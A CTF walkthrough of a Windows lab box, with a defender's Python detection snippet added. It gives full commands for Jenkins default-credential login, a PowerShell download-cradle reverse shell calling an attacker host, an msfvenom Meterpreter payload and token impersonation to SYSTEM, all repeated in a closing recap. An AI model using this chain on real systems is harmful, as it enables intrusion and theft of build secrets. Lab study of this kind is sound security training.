Windows Security: Abusing Access Tokens | A Practical CTF Walkthrough
ToxSec | Exploit misconfigured access tokens to impersonate SYSTEM and own the THM box.
0x00 Introduction
This Windows box is a clean lesson in chaining web-to-system exploitation. Jenkins gave us the foothold. Nishang and Meterpreter carried the shell. And Windows access tokens — specifically SeImpersonatePrivilege — handed us SYSTEM without breaking a sweat.
For hunters, the value here isn’t in shiny exploits. It’s in mastering the workflow: misconfigured Jenkins → reverse shell → token abuse → full compromise. If you’re building muscle memory for OSCP or red team work, Alfred is exactly the kind of scenario worth running twice.
0x01 Initial Enumeration
Start wide, then focus. First move was a fast scan:
nmap -F 10.10.176.75
Hits came back on three ports:
80/tcp → HTTP
8080/tcp → HTTP-proxy
3389/tcp → RDP
Port 80 was a dead end. Curl showed nothing but a Bruce Wayne tribute page (bruce.jpg) with a donation email. Standard stego checks (steghide, zsteg, exiftool) came up empty — logged as a red herring.
The real lead sat on 8080. Visiting http://10.10.176.75:8080 revealed a Jenkins login. First instinct: try defaults.
Username: admin
Password: admin
And we’re in. Jenkins v2.190.1, according to the footer. A quick version check confirmed what we were hoping: Script Console RCE was fair game.
0x02 Exploiting Jenkins
Once inside Jenkins, the quickest way to weaponize access is the Script Console.
Path:
Manage Jenkins → Script Console
Dropped in a test payload (the Script Console runs Groovy, so an OS command has to be executed from it rather than typed in bare):
println "whoami".execute().text
Came back clean; code execution confirmed. That’s all it takes: Jenkins with default creds is essentially remote code execution gift-wrapped.
Dropping a Reverse Shell
Listener up on our end:
nc -lnvp 8888
Served up a Nishang reverse shell:
python3 -m http.server 5555
Payload for Jenkins:
powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888
Connection popped as bruce. First flag down:
type C:\Users\bruce\Desktop\user.txt
At this stage, we’ve proven code exec, landed a stable reverse shell, and confirmed user-level compromise. Next step: tighten control with Meterpreter and line up the privilege escalation.
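From the defender's side, this chain leaves a loud process-tree fingerprint: the Jenkins service (java.exe) spawning powershell.exe with a download cradle in its command line. As an added example that is not part of the original post, here is a small Python triage function run over constructed Sysmon-style process-creation records; the field names follow Sysmon Event ID 1, and the records and paths are sample values, not logs from the box.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields) used as
# sample input; they are not logs taken from the original post or the box.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell iex (New-Object Net.WebClient)"
                    ".DownloadString('http://10.0.0.5:5555/x.ps1')",
     "User": r"ALFRED\bruce"},
    {"ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c git fetch origin", "User": r"ALFRED\bruce"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process", "User": r"ALFRED\alice"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Download-cradle indicators typical of one-line stagers.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|"
                    r"Invoke-Expression|\biex\b", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (severity, reasons) for one process-creation record."""
    reasons = []
    parent_path = ev["ParentImage"].lower()
    # Jenkins on Windows runs as jenkins.exe wrapping java.exe; either can be
    # the parent of a build step or of a Script Console command.
    jenkins_parent = "jenkins" in parent_path and \
        basename(parent_path) in {"java.exe", "jenkins.exe"}
    if jenkins_parent and basename(ev["Image"]) in SHELLS:
        reasons.append("Jenkins process spawned a shell")
    if CRADLE.search(ev.get("CommandLine", "")):
        reasons.append("download cradle in command line")
    # Legitimate build steps spawn cmd.exe all day, so a shell alone is only
    # medium; shell plus cradle is the pattern in this walkthrough.
    severity = {0: "none", 1: "medium", 2: "high"}[len(reasons)]
    return severity, reasons

def triage(events):
    """Return [(index, severity, reasons)] for every event that scored."""
    hits = []
    for i, ev in enumerate(events):
        severity, reasons = score_event(ev)
        if severity != "none":
            hits.append((i, severity, reasons))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```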
0x03 Privilege Escalation
The bruce shell was enough for a foothold, but Windows boxes rarely give up SYSTEM that easy. Time to level up.
Upgrading to Meterpreter
Generated a custom payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe
Caught it with a Metasploit handler:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 9001
run
Uploaded and executed shell.exe. The session flipped to Meterpreter, giving us better tooling for escalation.
Token Recon
Checked privileges:
getprivs
Gold mine: SeImpersonatePrivilege.
On Windows, access tokens are the keys to the kingdom. If you can impersonate a privileged token, you inherit its rights. SeImpersonatePrivilege makes that attack path trivial.
Abusing Tokens with Incognito
Loaded the module:
load incognito
list_tokens -g
Found what we needed:
Delegation token: BUILTIN\Administrators
Pulled the trigger:
impersonate_token "BUILTIN\\Administrators"
getuid
Result:
NT AUTHORITY\SYSTEM
Locking It In
Migrated into a SYSTEM-owned process for persistence:
ps
migrate <pid>
getuid
Confirmed SYSTEM. Root flag captured:
type C:\Windows\System32\config\root.txt
Box owned.
Side Note: Windows Tokens in the Wild
This box is the perfect case study for why Windows tokens matter.
Every Windows process runs under a token that defines its privileges.
If you can impersonate a privileged token (like Administrator or SYSTEM), you don’t need to exploit kernel bugs — you just “borrow” their authority.
SeImpersonatePrivilege is especially dangerous: it allows a lower-privileged account to act on behalf of higher-privileged accounts, often leading straight to SYSTEM.
In real-world pentests, token abuse is one of the fastest privilege escalation paths on misconfigured servers. The lesson: always check privileges (whoami /priv or getprivs) as soon as you land a shell. Tokens tell the story of what doors are already unlocked.
0x04 Debrief
Alfred was a reminder that you don’t need exploits fresh off Exploit-DB to wreck a system. Everything here was misconfig, default, or built-in:
Jenkins exposed with weak creds.
Script Console giving instant RCE.
Nishang/Metasploit payloads bridging to stable shells.
Windows token privileges wide open for abuse.
For bug bounty hunters, the real lesson is mindset: don’t overlook defaults. An exposed Jenkins instance might look boring on paper, but if Script Console is enabled, it’s usually a straight shot to code execution. And on Windows, if you see SeImpersonatePrivilege, stop digging — you’re one token impersonation away from SYSTEM.
This isn’t just CTF theater either. Jenkins sits everywhere in CI/CD pipelines. If attackers land there, they inherit build secrets, deployment credentials, and often domain trust. In production, that means far more than just a flag.
0x05 Command Recap
# Recon
nmap -F 10.10.176.75
curl 10.10.176.75
# Foothold (Jenkins default creds)
# Browse to http://10.10.176.75:8080 and log in as admin:admin
# Reverse Shell
nc -lnvp 8888
python3 -m http.server 5555
# Jenkins Script Console payload:
powershell iex (New-Object Net.WebClient).DownloadString('http://<attacker-ip>:5555/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <attacker-ip> -Port 8888
# Upgrade to Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=9001 -f exe -o shell.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 9001
run
# Token Abuse
getprivs
load incognito
list_tokens -g
impersonate_token "BUILTIN\\Administrators"
migrate <pid>
# Flags
type C:\Users\bruce\Desktop\user.txt
type C:\Windows\System32\config\root.txt